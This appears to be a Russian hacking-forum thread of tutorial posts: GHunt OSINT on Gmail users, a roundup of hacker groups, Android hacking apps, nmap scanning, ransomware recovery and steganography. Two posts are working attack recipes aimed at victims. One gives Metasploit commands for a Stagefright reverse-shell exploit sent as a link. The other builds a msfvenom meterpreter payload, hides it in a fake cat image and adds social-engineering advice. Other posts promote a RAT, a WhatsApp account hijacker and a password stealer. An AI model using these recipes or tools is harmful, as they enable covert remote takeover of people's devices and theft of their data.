Теперь, когда мы находимся в нашем каталоге GHunt, вы заметите файл с именем «requirements.txt». Это текстовый файл, содержащий все библиотеки и зависимости, необходимые для запуска GHunt. Чтобы установить все библиотеки сразу, введите следующую команду:
pip3 install -r requirements.txt
После успешной установки вам также необходимо установить:
pip3 install pipx
pipx ensurepath
pipx install ghunt
Все готово. Мы успешно установили GHunt на нашу машину с Linux. Теперь просто откройте новый терминал и введите следующую команду:
ghunt login
Далее Ghunt запросит некоторые файлы cookie, поэтому, чтобы получить файлы cookie, нам нужно будет установить расширение в нашем браузере — «Ghunt Companion». Есть две версии, одна для Firefox, другая для Chrome.
Загрузите Ghunt Companion по ссылке ниже в зависимости от используемого вами браузера:
Mozilla Firefox – ссылка
Google Chrome – ссылка
После установки расширения в браузере, вы должны войти в свою учетную запись Gmail (рекомендуем использовать для этой цели фейковую учетную запись, а не основную).
Вы увидите два метода: Выберите «Метод 2», чтобы автоматически скопировать файлы cookie в буфер обмена.
Затем вернитесь к своему терминалу и выберите вариант 2, а затем вставьте все выбранные файлы cookie.
https://i.gyazo.com/940714e3e85d20707b4ccaac78f3b135.jpg
Вот мы и закончили установку и настройку GHunt, давайте перейдём к Osint разведке.
Введите следующую команду, чтобы вывести список всех модулей.
ghunt -h
https://i.gyazo.com/d7cbff2f8c17d86b75c98e5cbcacc40a.jpg
Это основные возможности инструмента:
usage: ghunt [-h] {login,email,gaia,drive} ...
positional arguments:
{login,email,gaia,drive}
login Authenticate GHunt to Google.
email Get information on an email address.
gaia Get information on a Gaia ID.
drive Get information on a Drive file or folder.
Теперь давайте найдем некоторую информацию из идентификатора Gmail; для этого нам нужно ввести следующую команду:
ghunt email example@gmail.com
https://i.gyazo.com/dcb9d211ff130a555287677d204d0ec8.jpg
Мы использовали несколько случайных адресов электронной почты. И вот, что нам удалось найти: фото пользователя, Gaia ID и даже места, которые часто посещает наша цель. А еще отзывы, оставленные жертвой в Google Maps.
Заключение
GHunt может оказаться очень полезным инструментом для сбора информации для любого OSINTера. Стоит обратить внимание на то, что это никоим образом не является незаконным. OSINT - это совершенно легальный способ добычи информации, поскольку мы получаем ее из открытых источников, которые уже доступны в Интернете, а GHunt выступает в роли проводника, помогая нам собирать все эти данные в единое целое, облегчает работу и экономит время.
На этом все. Удачи в поисках!
BlackMAST
05.01.2023, 12:51
https://i.gyazo.com/927ce340b5738fe77dce413bb0403f95.jpg
Вступить в наш чат
В этом году мы наблюдали за многими хакерскими группировками и увидели, что их число не только выросло, но и увеличилось количество и масштабность атак, которым они подвергли многие организации: массовые утечки данные, сбои в системах безопасности, кражи денежных средств и многое другое. В этой статье мы расскажем о самых страшных хакерских группировках, которые без угрызений совести готовы разрушить любую компанию.
Кто в этом году себя плохо вёл?
https://i.gyazo.com/c6100d74e72284b7a9b77ba56ea86c1a.jpg
1. Lapsus$
Эта группировка обычно использует аналогичные методы для нападения на технологические компании, и только в 2022 году она взломала Microsoft, Cisco, Samsung, NVIDIA и Okta.
Хакеры использовали тактику социальной инженерии, чтобы воспользоваться персональным устройством подрядчика Uber, зараженным вредоносным ПО. Они также взломали компанию Rockstar Games, занимающуюся видеоиграми, незаконно загрузили кадры грядущей игры Grand Theft Auto VI и выложили в сеть 90 видеоклипов из еще не вышедшей игры, получили доступ к внутренним привилегиям Uber, включая Google Docs и Slack.
По словам Uber, никакие общедоступные системы, учетные записи пользователей или какие-либо конфиденциальные карты, финансовые данные или информация о поездках не были скомпрометированы. Но кто же скажет правду.
2. Conti
Хотя группировка якобы была закрыта в мае 2022 года, часть банды вымогателей Conti взломали системы правительства Коста-Рики, запустили атаки DDoS на серверы Cobalt Strike и атаковали правительство Украины, а также другие украинские и европейские гуманитарные и некоммерческие организации на фоне войны с Россией. Conti раннее в этом году заявили, что поддерживают Россию.
В расследовании Google было указано, что фишинговые электронные письма Conti рассылались от имени правоохранительных органов Украины и содержали ссылку, которая призывала жертв загрузить обновление для своей операционной системы. При этом сама атака включала в себя внедрение банковского трояна IcedID для кражи персональных данных.
3. Lazarus Group
Северокорейская хакерская группировка Lazarus Group за этот год украла криптовалюту на 30 миллионов долларов, однако, правительство США позже конфисковало её.
В период с февраля по июль 2022 года Lazarus нацелились на ряд организаций в Канаде, Японии и США и, используя уязвимости в VMWare Horizon и вредоносное ПО, получили к ним доступ.
Группировка была частично раскрыта, но в техническом отчете говорится, что основная цель атаки «вероятно, заключалась в том, чтобы установить долгосрочный доступ к сетям жертв для проведения шпионских операций в поддержку целей правительства Северной Кореи… нацеливание на критически важную инфраструктуру и энергетические компании для установления долгосрочного доступа для кражи частной интеллектуальной собственности».
4. LockBit
В этом году LockBit подвергали стабильным ежемесячным атакам, при этом каждый месяц жертвами становились около 70 человек.
Согласно анализу данных, на LockBit приходилось 46 % всех случаев взлома, связанных с программами-вымогателями, в первой половине 2022 года. Только в июне 2022 года группировка была связана с 44 атаками, что делает ее самой крупной и опасной среди всех за этот год.
LockBit также потребовала выкуп в размере 10 миллионов долларов от Centre Hospitalier Sud Francilien во Франции после того, как в августе 2022 года нарушила работу программного обеспечения больницы, и из-за чего приостановилась работа нескольких медицинских организаций. Сами члены LockBit не взяли на себя ответственность за атаку. «ИТ-система в больничном центре была практически парализована», — сообщал в то время France24. Самих больных пришлось перенаправлять в другое место, так как персонал работал с ограниченными ресурсами.
5. REvil
Этой группировке принадлежит крупная атака программы-вымогателя на поставщика программного обеспечения для управления информационными технологиями Kaseya, а еще попытка вымогательства 11 миллионов долларов у глобальной пищевой компании JBS. Помимо этого, REvil украла гигабайты финансовых данных у китайской компании по производству бытовой техники под названием Midea Group.
После чего все считали, что группировка была разоблачена и закрыта. Однако, многие убеждены, что это была тщательно продуманная тактика, чтобы уйти в тень и замести следы после первоначальной масштабной атаки. Россия заявила об изъятии у REvil 426 миллионов рублей, включая криптовалюту на сумму около 40 миллионов рублей. Несмотря на это, группировка по-прежнему не отступает и продолжает свои атаки.
Заключение
Ни одна организация не может быть 100% защищена от нападения хакерских группировок. Как только злоумышленники получают доступ к внутренним сетям, обнаружить их становится практически невозможно. Будучи незамеченными, они наносят колоссальный ущерб не только коммерческим компаниям, но и, в том числе, обычным пользователям и даже медицинским организациям. Компании должны приложить усилия для лучшего мониторинга сети и быстрого реагирования на первые хакерские действия. Минимальные проверки небезопасных протоколов или устройств с интенсивным трафиком имеют решающее значение для обеспечения безопасности.
BlackMAST
09.01.2023, 13:08
https://i.gyazo.com/3eba3be163c1c7bea1509c8b75efb384.jpg
Вступить в наш чат
Исследователем кибербезопасности из Zimperium была обнаружена уязвимость в Android, которая представляет собой тип атаки переполнения буфера. В этой статье речь пойдет о Stagefright. Этот удаленный эксплойт не требует никакой сложной работы, все что нужно сделать хакеру - это отправить вредоносную ссылку на файл, при нажатии на которую произойдет сбой: андроид будет взломан, а пользователь даже не догадается об этом. Сегодня мы покажем, как хакеры удаленно взламывают андроиды с помощью эксплойта Stagefright. Итак, приступим.
https://i.gyazo.com/631ce24a07c1f17e8d6d7e7a0eefed49.jpg
Дисклеймер: Данная статья представлена исключительно в образовательных целях для информирования читателей о взломах. Мы не несём ответственности за любые ваши действия.
Взлом Android с эксплойтом Stagefright
Шаг 1: Загрузите Kali Linux.
Запустите свой компьютер с Kali Linux и откройте Metasploit.
Шаг 2: Настройте сервер Metasploit для использования эксплойта stagefright.
Чтобы настроить Metasploit, введите следующие команды в консоли msf:
use exploit/android/browser/stagefright_mp4_tx3g_64bit
set SRVHOST 192.168.182.136 (your IP here)
set URIPATH /
set payload linux/armle/meterpreter/reverse_tcp
set lhost 192.168.182.136 (здесь ваш IP)
set verbose true
exploit -j
https://i.gyazo.com/64b260ea33b07f27864919b9b1bde610.jpg
Шаг 3: Теперь, когда эксплойт запущен, отправьте вредоносную ссылку жертве.
В нашем случае ссылка такая: http://192.168.182.136:8080/
Шаг 4: Наслаждайтесь взломом.
Как только жертва нажмет на ссылку, ее телефон будет скомпрометирован. И вы сможете управлять им удаленно с помощью эксплойта stagefright.
Эта атака работает не на всех андроидах, только с устаревшем ПО.
Как защититься от этого хака?
Проверьте, не уязвимо ли ваше устройство. Для этого используйте приложение Norton для защиты от эксплойтов.
Обновите ваш телефон: эта уязвимость давно исправлена, убедитесь, что вы регулярно обновляете свое устройство.
Поменяйте телефон: не используйте устаревшие устройства, которые не обновлялись более года.
Google Play: устанавливайте приложения только из официального магазина игр. Не открывайте неизвестные ссылки и файлы, которым вы не доверяете.
Установите антивирус: дополнительная защита не повредит и всегда поможет быть начеку.
На этом все. Удачи!
BlackMAST
12.01.2023, 12:35
https://i.gyazo.com/653098f3752157cbbf2c3f336af12d90.jpg
Вступить в наш чат
Приложения для взлома — один из самых популярных запросов в браузере и в Google Play. Иметь хакерские приложения прямо в телефоне желает каждый, но вряд ли поиски в Интернете приведут вас к желаемому результату. Итак, сегодня мы собрали для вас список лучших хакерских приложений для Android, которые понравятся даже опытному взломщику.
1. AndroRAT
https://i.gyazo.com/d4eed85708100d4902d170548215c4d7.jpg
AndroRAT — это приложение, разработанное на Java Android и представляющее собой смесь Android и RAT. Это инструмент удаленного доступа, используемый для дистанционного управления устройствами через компьютер. Он может похвастаться многими полезными функциями. AndroRAT умеет отслеживать сообщения и звонки, проверять историю браузера, делать снимки с камеры, отправлять текстовые сообщения, следить за активностью пользователя и собирать отчёт об установленных приложениях.
2. zANTI
https://i.gyazo.com/e7e7176c34787ba1d99d090bfbfe910b.jpg
ZANTI — это must have для вашей телефонной безопасности, даёт полное представление от уровне риска одним нажатием кнопки. Приложение разработано Zimperium и используется для тестирования на проникновение мобильных устройств, позволяет оценить угрозу и определить методы, которые может использовать злоумышленник для взлома вашего устройства. ZANTI также автоматически диагностирует уязвимости в мобильных устройствах или на веб-сайтах с помощью множества тестов на проникновение, включая атаку «человек посередине» (MITM), взлом паролей и Metasploit.
3. cSploit
https://i.gyazo.com/1e10ecb538be3a3b6fb84ed18f9e2781.png
cSploit — это набор инструментов для проникновения и анализа сети Android. После запуска cSploit вы сможете легко отобразить свою сеть, осуществлять взлом в систему многих протоколов TCP, выполнять атаки «человек посередине», перехватывать пароли и многое другое.
4. FaceNiff
https://i.gyazo.com/98c37011aafa5c56c8a948a76524412a.jpg
FaceNiff — это приложение для Android, которое позволяет вам сниффить и перехватывать данные через Wi-Fi, к которому подключен ваш телефон. Перехват сеансов возможен только тогда, когда Wi-Fi не использует EAP. Faceniff поддерживает такие сервисы, как Facebook, Twitter, YouTube, Amazon, ВКонтакте, Tumblr, MySpace и другие.
5. SSHDroid
https://i.gyazo.com/728e6c0da2da96cba771a50acd0bc7e6.jpg
SSHDroid — это реализация SSH, которую можно использовать для устройств Android. С помощью этого инструмента вы можете подключить свой телефон к компьютеру, а затем выполнить команду посредством SFTP, Nautilus (для Linux), WinSCP (для Windows) и Cyberduck (для Mac). Это одно из лучших приложений для взлома Android на рынке. У SSHDroid есть как бесплатная, так и премиум-версия. Приложение также обеспечивает безопасность и конфиденциальность пользователя.
6. Wi-Fi kill
https://i.gyazo.com/f36a9c077ef2b813146e2c54e9983db7.jpg
В наших прошлых статьях мы рассказывали о том, как хакнуть Wi-Fi и чем опасен такой взлом для вашей сети. Всякий раз, когда вы чувствуете, что ваш Wi-Fi не дает вам достаточно мощности, скорее всего кто-то другой использует его без вашего разрешения. Что ж, Wi-Fi kill — лучшее решение для незваных гостей. С помощью этого приложения вы сможете отследить и затем удалить всех пользователей, которые используют ваш Wi-Fi.
7. Hackode
https://i.gyazo.com/de53f4f40eb5c20ae32637bf6b44a834.jpg
Hackode — это приложение для Android, созданное для тестировщиков на проникновение, этичных хакеров, ИТ-администраторов и специалистов по кибербезопасности для выполнения различных задач, таких как OSINT-разведка, взлом Google, Google Dorks, Whois, сканирование, поиск DNS, IP, записей MX, DNS и так далее. Это приложение все еще находится в стадии бета-тестирования, но скоро оно станет официальным.
BlackMAST
16.01.2023, 12:59
https://i.gyazo.com/c5d810e5440296881abe0a85582f64ad.jpg
Вступить в наш чат
Приложения для взлома — один из самых популярных запросов в браузере и в Google Play. Иметь хакерские приложения прямо в телефоне желает каждый, но вряд ли поиски в Интернете приведут вас к желаемому результату. Итак, сегодня мы собрали для вас топ-10 лучших хакерских приложений для Android, которые понравятся даже опытному взломщику.
Ознакомиться с первой частью подборки можно по ссылке (https://forum.antichat.xyz/threads/750994/post-331918).
1. Kali Linux NetHunter
https://i.gyazo.com/abd367ec4b6b0493bb4a8b18e86c2945.jpg
Мы не могли обойти стороной это приложение. Совместимость Kali NetHunter с устройствами Android позволила ему стать одним из первых и самых популярных ПО для тестирования на проникновение. Kali NetHunter имеет открытый исходный код. Приложение поставляется с несколькими функциями, включая SQL инъекцию, режим AP, атаки MITM и HID с клавиатуры. Kali NetHunter в основном работает как оверлей на вашем устройстве и собирает интернет-трафик.
2. DroidBox
https://i.gyazo.com/c663d6f1b715b279ccf29116b2344495.jpg
DroidBox - это карманный помощник для вашего устройства. Он даёт полный анализ всех приложений на Android. Помимо этого, его можно использовать для повышения эффективности работы вашего устройства: получения результатов, касающихся хэшей APK, SMS, телефонных звонков, сетевого трафика, потери информации по различным каналам и много другого.
3. Fing
https://i.gyazo.com/2a12a3395684b6c7696b47ee3cfd099f.jpg
Сетевой сканер Fing используется для обнаружения устройств, подключенных к сети Wi-Fi пользователя, а также для определения местоположения устройства. Кроме того, он обладает способностью обнаруживать злоумышленников, защищать сеть от любых киберрисков, устранять сетевые проблемы, обеспечивая наилучшую производительность сети.
4. USB Cleaver
https://i.gyazo.com/86d2e05a0ae348dfcc99d69c2983db3c.jpg
Приложение USB Cleaver обеспечивает быстрый сбор паролей с Windows. Если подключить андроид по USB-кабелю к компьютеру Windows, на котором активирована функция Autostart, то приложение автоматически соберет следующую информацию: пароли из браузеров (Firefox, Chrome, IE), пароль от WiFi, сетевую системную информацию. Все украденные данные будут хранится в защищенном zip-файле.
5. Droidsheep Guard
https://i.gyazo.com/f76a23b595d986587450a5ff15771404.jpg
Droidsheep Guard — это продвинутое приложение, которое легко и быстро защитит вас от нападок хакеров. Вы можете использовать его для безопасного просмотра в соц. сетях и Интернет-сёрфинга. Droidsheep Guard может защитить вас от атак типа «Человек посередине», таких как DroidSheep, Faceniff и т. д. Приложение также отправит вам предупреждающее сообщение о подозрительной активности и советы, как действовать в опасной ситуации.
6. Encrypt Decrypt Tools
https://i.gyazo.com/30f677f6f3a5a0c538c4b2ee9b6246e5.jpg
Как следует из названия, это приложение основано на шифровании данных и, следовательно, обеспечивает конфиденциальность пользователя. Это одно из лучших приложений для взлома Android на рынке. Вы можете защитить сообщение или данные, включив режим шифрования, а затем расшифровать их, когда захотите. Приложение будет полезным как для личного, так и для профессионального использования.
7. Whatscan
https://i.gyazo.com/85a15a3bda4dc709f06a7f68edf038f1.jpg
Whatscan — это сканер WhatsApp, который можно использовать для получения доступа к учетной записи WhatsApp любого человека. Если вы ищете какое-либо приложение, через которое можно взломать аккаунт WhatsApp другого пользователя, то это лучший вариант. Все, что вам нужно, это QR-код Вотсапа жертвы, чтобы начать.
8. PixelKnot
https://i.gyazo.com/f547d6a6020be090f3fc33b64443e65f.jpg
PixelKnot — это приложение для Android, которое можно использовать для скрытия текстовых сообщений с помощью фотографий для дальнейшей передачи. Приложение будет полезно для отправки секретных сообщений, таких как пароли или PIN-коды. Это простой и интересный способ шифрования данных. Риск разоблачения довольно невелик, поскольку никто не подозревает, что фото содержат секретные коды или что-то в этом роде.
9. NetCut
https://i.gyazo.com/beccd07bfa6a0f2d7846c708bb8ef1d3.jpg
NetCut — это бесплатное приложение для Android, которое используется для обнаружения сети, используемой в WiFi. Вы можете получить доступ к WiFi и пользоваться Интернетом, даже если ваше устройство имеет недействительный IP-адрес и ему не разрешен доступ в Интернет. Помимо этой функции, вы можете переназначить MAC-адрес и контролировать использование пропускной способности вашей сети.
10. WPS Connect
https://i.gyazo.com/48d3b206864e8b3af67b2f6d66f6b479.png
WPS Connect — это приложение, используемое для взлома сетей WiFi с включенным протоколом WPS. Он проверяет уязвимость маршрутизатора к любому ПИН-коду по умолчанию. Его можно использовать для взлома сети Wi-Fi абсолютно бесплатно.
BlackMAST
18.01.2023, 12:50
https://i.gyazo.com/fb20b5dcd8562bfbd2f49b03df7d6e7b.jpg
Вступить в наш чат
Network Mapper - утилита, которую любят хакеры, системные администраторы и даже Голливуд (в фильме «Матрица» при взломе используется именно NMAP). В этой статье мы расскажем об этом бесплатном и необходимом инструменте, который вам точно понравится.
https://i.gyazo.com/206de6f922c06e2a43f6074d2146d159.jpg
NMAP — сетевой сканер, созданный Гордоном Лайоном, который помогает осуществлять анализ сети, сканировать ее и выявлять подключения. NMAP в процессе сканирования сети перебирает доступный диапазон портов и пытается подключиться к каждому из них. Если подключение успешно, то вы можете узнать версию программного обеспечения, открытые порты и даже найти уязвимости, которые затем можно использовать. В этом и заключается сила NMAP или Network Mapper. Программа совместима со всеми операционными системами, включая Windows, Mac и Linux. Мы же покажем его в действии на примере Kali Linux. Давайте приступим.
Мы не будем останавливаться на установке утилиты, информация об этом доступна в Интернете, перейдём сразу к работе NMAP.
Пингуем все доступные хосты в нашей сети
Итак, чтобы пропинговать устройство в любой сети, мы должны просто набрать следующую команду:
ping
https://i.gyazo.com/f052fe942930c75639ecc3ecf95f265a.png
Мы проверили, работает ли устройство или нет.
Но что, если мы хотим просканировать всю сеть и определить, какие устройства работают в нашей сети?
Предположим, что наша домашняя сеть — 192.106.54.2/24, что означает 254 конечных точек или хостов, доступных в нашей сети. Для обычного пользователя невозможно их всех проверить, что нельзя сказать про NMAP, которая сканирует всю сеть и показывает, какой хост работает. Для этого введём команду:
nmap -sP
https://i.gyazo.com/a436f5521b5edde59c86cc8155223744.png
Хакеру недостаточно знать лишь какие хосты работают, нужна дополнительная информация. Вторым шагом мы ищем открытые порты.
Проверка открытых портов
Допустим, мы хотим взломать веб-сайт и найти все конечные точки сети, на которых запущен этот сайт.
Что мы будем искать?
Обычно мы рассматриваем порты 80 или 443, так как они чаще всего открыты на сервере.
Для того, чтобы узнать наверняка используем следующую команду:
nmap -sT -p 80,443
https://i.gyazo.com/49df959ecf8f15419d33830065e12758.png
Здесь -sT — это тип сканирования портов, называемый TCP-соединением, которое выполняет трехстороннее рукопожатие и предоставляет нам эти результаты.
Режим скрытности NMAP
Какова цель этого режима?
Скрытый режим необходим, потому что в некоторых случаях команды NMAP могут действовать навязчиво, а меры безопасности, такие как брандмауэр или IDS, могут блокировать дальнейшее выполнение запроса. Именно поэтому, мы будем использовать следующую команду:
nmap -sS -p
https://i.gyazo.com/11d4227f35acbe2f28d245de73985ddc.png
Скрытое сканирование также известно как сканирование SYN, оно используется, чтобы избежать трехсторонних рукопожатий и брандмауэров для успешного завершения команды. Однако, сейчас нет полной уверенности, что вы все равно не попадёте в брандмауэры, используя метод скрытого сканирования.
Руководство по NMAP
Nmap имеет в своём арсенале большой набор функций, которые вы можете использовать для сканирования. Введите следующую команду, и программа предоставит вам весь список:
man nmap
Чтобы узнать, какую операционную систему использует ваша цель, просто напишите:
nmap -O
https://i.gyazo.com/2f6f27b54b692d9a58c829e2d36953da.png
Программа предоставит вам подробную информацию о системе вашей цели, а также сообщит, какие порты открыты.
NMAP-скрипты
У NMAP есть ещё одна мощная и гибкая функция — свой скриптовый движок, который позволит вам писать скрипты.
https://i.gyazo.com/725d677bb79a42a867c26cf9d84657ee.png
Перед нами представлены все категории подсистемы сценариев NMAP. Выберем, например, категорию под названием «vuln», которая является уязвимостью. Теперь, при сканировании системы с этой категорией, программа сообщит вам, какие порты открыты и укажет уязвимости, которые есть в системе.
Если вы узнаете об уязвимости в какой-либо системе, то просто можете воспользоваться этим и получить контроль над всей системой.
nmap --script
В категории «vuln» есть несколько скриптов, но хакер не может проверить каждый скрипт. Для этого можно просто ввести nmap --script vuln 10.13.1.82. NMAP будет пробовать каждый элемент в списке, пока не найдет фактическую уязвимость в системе. Этот пример был для скриптов в категории «vuln». Вы же можете сделать это с любой категорией, просто выполнив следующую команду:
nmap --script
Заключение:
Это был всего лишь краткий обзор NMAP. Мы рассмотрели сканирование портов NMAP и примеры использования данной программы. Но на самом деле NMAP имеет множество других функций сканирования, и если вы хотите их освоить, продолжайте экспериментировать. Практикуйтесь, и тогда результат не заставит себя ждать. Желаем успехов!
BlackMAST
23.01.2023, 12:53
https://i.gyazo.com/75f2d2c41c5e79f35b15e23f8445df13.jpg
Вступить в наш чат
Да что может случится, если открыть картинку? На первый взгляд, ничего страшного. Но если вы прочтете эту статью, то узнаете, что именно таким простым способом можно получить полный контроль над компьютером жертвы, лишив её доступа к своим же собственным файлам. Да-да, и все это с помощью одной лишь картинки.
https://i.gyazo.com/3ce774b97a535524576a48b504aa89fa.jpg
Дисклеймер
Данная статья предназначена только для образовательных целей, не используйте ее во вред другим людям. Мы не несем ответственности за любые ваши действия.
Требования для взлома
Найдите любое изображение, которое понравится вашей жертве (мемы, котики, аниме);
Kali Linux, с помощью которого будет создаваться вредоносное ПО;
Второй компьютер с Windows, на который должен быть установлен WinRAR.
Создание полезной нагрузки
Для создания полезной нагрузки у вас должен быть установлен Kali Linux.
Прежде всего, откройте терминал, введите msfconsole и подождите, пока он загрузится.
Затем введите следующую команду, при этом обязательно проверьте свой IP-адрес и скопируйте его.
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=555 -f exe -e x86/sikata_ga_nai -i 10 > .exe
https://i.gyazo.com/5b04e0f85fa12de2756addecf645cd98.png
После этой команды ваша полезная нагрузка будет создана.
Прикрепляем полезную нагрузку к картинке
Теперь переключитесь на компьютер с Windows, на котором уже установлен WinRAR.
Итак, у вас есть 2 файла, а именно файл картинки, которую вы скачали, и полезная нагрузка, которую мы создали.
Введите в браузере «icon maker» или перейдите по этой ссылке. После этого создайте иконку загруженной вами картинки.
Итого у вас уже есть все 3 файла, которые нам понадобятся, поэтому теперь выберите полезную нагрузку, картинку и щелкните их правой кнопкой мыши, затем нажмите «добавить в архив».
После этого последовательно выполните пункты:
Во вкладке «Общие» нажмите «Создать массив SFX»;
Кликнете по вкладке «Дополнительно» и выберите «Дополнительные параметры SFX»;
Далее во вкладке «Обновление» нажмите «Извлечь и обновить файлы»;
В «Настройках» вы увидите два пункта, а именно «Выполнить после извлечения» и «Выполнить перед извлечением»;
В пункте «Выполнить после извлечения» напишите полное имя файла изображения вместе с типом файла. Подтвердите и после этого напишите имя файла полезной нагрузки с типом файла;
Затем во вкладке «Текст и значок» снизу вы увидите «Загрузить значок SFX из файла», нажмите и выберите иконку, который вы создали из картинки;
Во вкладке «Режимы» нажмите «Скрыть все» и кликнете «ОК».
Теперь откроется окно WinRAR; там, во вкладке «Общие», измените имя на любое, которое вы хотите, а также укажите расширение, например, котики.jpg.
Готово! Вы успешно создали полезную нагрузку.
Теперь пришло время создать прослушиватель, который будет создавать отчет по запросам.
Создание прослушивателя
Откройте новый терминал и введите msfconsole после завершения загрузки;
Напишите «use multi/handler» —> «Enter»;
Затем введите «set payload windows/meterpreter/reverse_tcp» и нажмите Enter;
Введите «show options», чтобы увидеть, что требуется для настройки слушателя;
https://i.gyazo.com/f27d7b38adb4876961fdbdcf20c12c7f.png
Теперь он запросит LHOST и LPORT; напишите LHOST, который вы написали при создании полезной нагрузки, и то же самое касается LPORT.
Далее введите «выполнить» и нажмите «Enter».
Социальная инженерия
Все готово, и остаётся только подумать о том, как заставить жертву открыть вашу картинку. На самом деле, с изображением дела обстоят куда лучше, чем с ссылками, так как многие люди даже не подозревают, что за картинкой с мемом может скрываться вредоносный файл.
И наконец, как только ваша жертва откроет файл, вы получите запрос от вашего слушателя. Вы успешно взломали компьютер.
Этот метод возможен только в том случае, если жертва и вы подключены к одной и той же сети. Если вы хотите атаковать кого-то, кто не находится в вашей сети, вам придется изменить несколько параметров. Об этом поговорим в другой раз.
На этом все. Удачи!
BlackMAST
25.01.2023, 10:10
https://i.gyazo.com/e1ed3b4b6b6a56745549db2466384bce.jpg
Вступить в наш чат
Представьте, что вам приходит сообщение от злоумышленника, в котором содержится вредоносное вложение с кодом, который скачивает программу-вымогатель, как только вы открываете файл. «И что происходит дальше?», - спросите вы. Программа-вымогатель просканирует важные файлы и зашифрует их так, что вы не сможете расшифровать их без ключа, за доступ к которому злоумышленник потребует выкуп. Вымогательское ПО наносит урон быстрее, чем любые другие вредоносные приложения.
Но не стоит впадать в панику, потому что сегодня мы расскажем вам, что вы должны делать, если подверглись нападению такой программы, и как впредь защитить свою систему от возможных атак.
https://i.gyazo.com/d22e49b967f122462c0181fbd598a617.png
Не следует сразу прибегать к профессиональной помощи или, что ещё хуже, идти на поводу злоумышленников и отправлять им деньги, потому что вы сами в состоянии справится с вторжением вредоносной программы. Просто следуйте нижеуказанным пунктам, и у вас все получится.
Заблокируйте свою сеть
Самое первое, что вы должны сделать, это изолировать зараженный компьютер от сети. Поскольку 90% кибератак зашифровывают сетевой жесткий диск, все другие устройства, подключенные к той же сети могут тоже пострадать.
Итак, вы должны включить брандмауэр, тем самым защититься от несанкционированного доступа или использовать самый традиционный метод — отключить ПК от розетки. В этой ситуации главное предотвратить дальнейшее распространение программы-вымогателя.
Не переносите новые файлы в зараженную систему
Никогда не переносите файлы в зараженный компьютер, так как существует множество программ-вымогателей, которые шифруют в режиме реального времени, поэтому любые новые файлы, которые вы переносите в систему, тоже подвергнутся атаке.
Это типичная ошибка, которую совершают многие люди, поскольку они думают, что атака уже завершена, и угроз больше нет, поэтому удаляют зараженные файлы и восстанавливают исходные файлы из резервной копии. Однако, все это приводит к шифрованию этих восстановленных файлов, потому что программа-вымогатель все еще активна.
Остановите работу программы
Вам необходимо избавиться от активного вредоносного ПО в системе, для этого вы можете прибегнуть к помощи антивируса. Но делать это нужно с особой осторожностью, потому что не каждый антивирус сможет локально удалить исполняемый файл, не тронув сами файлы или даже ключевой файл, навсегда их зашифровав. Будьте внимательны при запуске сканирования и не удаляйте никакие ключевые, текстовые файлы или заметки о выкупе, просто удалите исполняемый файл.
Вы, должно быть, подумали: «Это все, конечно, хорошо, но как я могу расшифровать свои файлы?».
Проверьте варианты расшифровки
Теперь самое время проверить, возможно ли самостоятельно расшифровать ваши файлы.
Поскольку исследователи безопасности взломали большое количество программ-вымогателей, они также создали расшифровщик, который находится в свободном доступе, так что скорее всего вы можете расшифровать зараженные файлы без уплаты выкупа.
Существует потрясающий сайт, который не только расскажет вам, какая у вас программа-вымогатель, но и даже даст вам ссылку для скачивания дешифратора.
Сайт называется ID Ransomware. Он бесплатный и очень простой в использовании.
https://i.gyazo.com/b471211ff14a20d5051a07cf5d3b8f24.jpg
Убедитесь, что у вас есть резервные копии
Если вы читаете дальше, то предыдущий шаг вам, к сожалению, не помог. Да, есть несколько программ-вымогателей, которые до сих пор невозможно взломать, и исследователи безопасности все еще работают над ними. Поэтому, если вы подверглись нападению таких программ-вымогателей, лучше удалите все файлы и перезагрузите систему, убедившись, что у вас есть резервная копия файлов.
Если у вас нет резервной копии, обязательно посетите эту страницу, заполните данные и отправьте. Вам пришлют письмо после того, как создадут дешифратор, который вернет ваши файлы. Это трудоемкий процесс, поэтому запаситесь терпением.
https://i.gyazo.com/dfc3455e269f63af46e1435ce0c85da2.jpg
Переговоры с нападающим
Если ждать не ваш вариант, и вам срочно нужны файлы, то вы всегда можете заплатить выкуп. Однако, мы не советуем этого делать, но и останавливать вас не имеем права. Единственное, что мы можем посоветовать, так это попробовать договориться с злоумышленниками, поскольку было замечено, что они часто снижают первоначальную цену.
Но даже если вы выплатите всю нужную сумму, нет никаких гарантий, что злоумышленники отправят вам подлинный дешифратор, а не какой-нибудь левый, который даже не запустится на вашем ПК. Итого: вы потратите деньги и останетесь ни с чем, поэтому оставьте эту затею и дождитесь помощи от команды ID Ransomware.
Вот мы и подошли к концу сегодняшней темы. Мы верим, что данная статья помогла вам противостоять атаке программ-вымогателей, и вы узнали, что делать, если вдруг вы подвергнитесь подобной атаке, что мы надеемся никогда не произойдет, но как гласит цитата на сайте ID Ransomware:
«Знание - половина победы».
BlackMAST
26.01.2023, 17:08
https://i.gyazo.com/4b3a381f0ddb4c4c1c0919e3e41fef70.jpg
Вступить в наш чат
Стеганография — это метод, используемый для сокрытия файлов и конфиденциальных данных внутри изображения, чтобы их можно было передавать, не вызывая никаких подозрений. Этот метод является одним из основ криптографии, и в этой статье мы покажем вам, как скрыть файлы в фотографии или аудиозаписи с помощью Steghide и Kali Linux.
https://i.gyazo.com/73dbe91820f20ecba44d6ee2b14a4b22.jpg
Как зашифровать файлы в Kali Linux
Для начала давайте разберемся, как же все-таки работает стеганография.
Главная задача стеганографии - это спрятать файлы и данные внутри изображения так, чтобы сам факт их существования был скрыт. Для этого файлы шифруются с помощью ключа доступа, для расшифровки которого требуется другой ключ на стороне получателя. Таким образом, никто не сможет обнаружить то, что вы утаили, для просмотра данных человеку потребуется ключ дешифрования.
В процессе шифрования нам потребуется специальный инструмент Steghide, использующий код доступа для скрытия информации внутри изображений.
Особенности Steghide:
сжатие и шифрование встроенных данных;
поддержка файлов JPEG, BMP, WAV и AU (да, он поддерживает даже аудиофайлы).
Теперь, когда мы ознакомились с теоретической частью, можем начинать.
Шаг 1: Откройте терминал Kali Linux и клонируйте репозиторий steghide:
apt-get install steghide
Шаг 2: Загрузите изображение, в котором будете прятать файл.
Шаг 3: В терминале Kali Linux измените рабочий каталог на Desktop, используя следующую команду:
cd Desktop
Шаг 4: Убедитесь, что оба файла, то есть изображение JPG, и текстовый файл находятся в одном рабочем каталоге. В этом руководстве используется каталог Desktop. Вы можете выбрать любой.
https://i.gyazo.com/8e22bc5630f2cb4dc2bb7351901e7192.jpg
Мы скачали изображение и назвали его girl.jpg. Файл, который будем прятать — secret.txt.
Шаг 5: Введите steghide или steghide -h, чтобы отобразить все возможности инструмента.
